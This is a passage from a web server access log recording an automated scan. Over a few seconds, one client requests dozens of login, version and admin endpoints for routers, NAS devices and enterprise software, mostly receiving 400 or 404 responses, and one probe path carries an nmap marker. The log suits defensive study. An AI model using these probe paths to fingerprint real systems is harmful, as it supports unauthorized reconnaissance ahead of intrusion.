"/ise/img/rm-logo_small.png" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/webportal.cgi" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/authLogin.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/am_bin/amlogin" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/centreon/api/latest/platform/versions" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/images/logo.gif" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/system/version/current" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/i18n/component/JS" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.jsp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/css/eonweb.css" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/version" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/hx/api/about" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/app/ui/login.jsp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/images/logo.png" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/login/?next=/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/Main_Login.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.cfm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/luci" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/web/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/css/elfinder.min.css" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/authLogin.cgi" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/centreon/api/latest/platform/versions" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/plugin/webs_model_cfg.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/photo/webapi/query.php?api=SYNO.API.Info&method=query&version=1" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.shtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/phoenix/favicon.ico" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/metrics" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/rs/application-about" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/json/login_session" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/am_bin/amlogin" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 200 - GET http 91-82-83-208.pool.digikabel.hu "/index.html" [Client 172.235.168.35] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nidp/app/login" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:57 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/hx/api/about" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/about" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/system/version/current" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/info" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ui/login.action" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main/main.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/core/auth/login/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/login" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/assets/png/favicon-abe32304.png" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/themes/admin/default/build/assets/favicon-19fbef86.svg" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:03:02:58 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/app/ui/login.jsp" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/agc/vicidial.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/status" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/App_Themes/Default/Images/favicon.ico" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/MagicInfo/config.js" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v2/hoverfly/version" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/login/?next=/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/agent/vicidial.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin/config.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/~login" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/mailinspector/login.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/config_dump" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.shtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/jtcgi/wte.pyc" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/system/gwinfo" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/plugin/webs_model_cfg.js" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.do" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/decisioncenter-api/v1/about" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/AppsHome.do" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/openapi.json" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nifi-api/flow/about" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/Main_Login.asp" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/images/logo.gif" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/dashboard/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:03:02:59 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/version" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/pandora_console/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.shtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/luci" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nifi/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/tos/index.php?user/login" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/login.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nmaplowercheck1768705365" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/photo/webapi/query.php?api=SYNO.API.Info&method=query&version=1" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/v2" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v3/meta" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/assets/img/favicon.ico" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/rs/application-about" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/evox/about" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/nidp/app/login" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/meteobridge.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.pl" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sys/en/neoclassic/login/login" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.lua" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/index.html" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/json/login_session" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sap/bc/ui2/flp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/info.htm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/kubepi/fav.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/themes/admin/default/build/assets/favicon-19fbef86.svg" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/metrics" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ignite?cmd=version" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api-description" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/about" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/plugins/post-smtp/readme.txt" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/main/main.html" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/management/v1/cluster/state" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/monitor/index.php/auth/login" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v2.0/systeminfo" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/dashboard/favicon.ico" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:00 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v2/hoverfly/version" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:01 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/login" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.shtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/cluster/summary" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/browser/index.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nmc/rss/server" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:01 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/public/static/favicon.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:03:03:01 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/info" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ScadaBR/login.htm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 